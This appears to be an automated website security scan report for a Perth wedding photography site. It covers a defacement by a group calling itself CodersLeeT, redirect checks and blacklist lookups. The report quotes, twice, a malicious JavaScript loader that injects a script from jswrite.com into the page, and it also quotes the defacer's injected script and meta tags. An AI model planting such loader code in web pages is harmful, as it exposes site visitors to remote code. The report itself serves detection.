Scanned pages/files
Request | Server response | Status |
http://www.weddingphotoperth.com/ | 200 OK Content-Length: 7919 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) if(top == self){ var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By CodersLeeT Team Contact To www.facebook.com/codersleet.gov ...[1492 bytes skipped]... Gov.png" rel="SHORTCUT ICON"><link rel="shortcut icon" href="http://teste-codersleet.cum.ir/Codersleet.Gov.png" type="image/x-icon"><script src="http://teste-codersleet.cum.ir/AZe-titel.js"type="text/javascript"></script> <!-- Meta --><meta name="keywords" content="CodersLeeT , Codersleet Team , Hackers , Exploit , Anonymous"><meta name="description" content="Hacked By CodersLeeT Team Contact To www.facebook.com/codersleet.gov"><meta name="AUTHOR" content="CodersLeeT , Hacked By Codersleet , Codersleet Was Her"><meta name="Copyright" content="CodersLeeT Copyright 2014 - 2015"><meta name="Designer" content="MC.KIio"><meta name="Publisher" content="Hacked By CodersLeeT Team www.facebook.com/codersleet.gov"><meta name="ROBOTS" content="INDEX, FOLLOW,ALL"> <embed src="http://www.youtube.com/v/3G-t72JjRf0&feature=youtu.be&featur ...[6370 bytes skipped]... | ||
http://teste-codersleet.cum.ir/AZe-titel.js | 200 OK Content-Length: 1812 Content-Type: application/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://www.weddingphotoperth.com/test404page.js | 200 OK Content-Length: 7919 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(top == self){ var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: weddingphotoperth.com
Result:
GET / HTTP/1.1
Host: weddingphotoperth.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: weddingphotoperth.com
Referer: http://www.google.com/search?q=weddingphotoperth.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: weddingphotoperth.com
Referer: http://www.google.com/search?q=weddingphotoperth.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=weddingphotoperth.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://weddingphotoperth.com/
Result: weddingphotoperth.com is not infected or malware details are not published yet.
Result: weddingphotoperth.com is not infected or malware details are not published yet.